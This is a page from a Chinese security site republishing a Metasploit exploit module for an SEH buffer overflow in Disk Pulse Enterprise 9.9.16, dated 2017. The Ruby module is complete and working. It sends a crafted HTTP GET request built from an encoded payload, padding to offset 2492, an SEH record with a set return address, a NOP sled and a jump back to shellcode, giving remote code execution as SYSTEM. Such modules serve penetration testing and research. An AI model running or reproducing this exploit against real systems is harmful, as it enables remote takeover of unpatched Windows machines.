首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Disk Pulse Enterprise 9.9.16 GET Buffer Overflow 来源：metasploit.com 作者：Johnson 发布时间：2017-09-21   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' => %q( This module exploits an SEH buffer overflow in Disk Pulse Enterprise 9.9.16. If a malicious user sends a crafted HTTP GET request it is possible to execute a payload that would run under the Windows NT AUTHORITY\SYSTEM account. ), 'License' => MSF_LICENSE, 'Author' => [ 'Chance Johnson', # msf module - albatross@loftwing.net 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com ], 'References' => [ [ 'EDB', '42560' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => 'win', 'Payload' => { 'EncoderType' => "alpha_mixed", 'BadChars' => "\x00\x0a\x0d\x26" }, 'Targets' => [ [ 'Disk Pulse Enterprise 9.9.16', { 'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll 'Offset' => 2492 }] ], 'Privileged' => true, 'DisclosureDate' => 'Aug 25 2017', 'DefaultTarget' => 0)) register_options([Opt::RPORT(80)]) end def check res = send_request_cgi( 'uri' => '/', 'method' => 'GET' ) if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit connect print_status("Generating exploit...") exp = payload.encoded exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset exp << generate_seh_record(target.ret) exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start exp << 'B' * (5000 - exp.length) # padding print_status("Sending exploit...") send_request_cgi( 'uri' => '/../' + exp, 'method' => 'GET', 'host' => '4.2.2.2', 'connection' => 'keep-alive' ) handler disconnect end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Edge 38.14393.1066.0 ·Linux Kernel <= 4.13.1 - BlueT ·HPE < 7.2 - Java Deserializati ·Microsoft Edge - Chakra Incorr ·Apache - HTTP OPTIONS Memory L ·Microsoft Edge Chakra - Deferr ·Microsoft Windows Kernel - 'wi ·Microsoft Edge Chakra - 'Parse ·Microsoft Windows Kernel - 'wi ·Microsoft Edge Chakra - 'Javas ·Microsoft Windows Kernel - 'wi ·Stock Photo Selling 1.0 - SQL   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved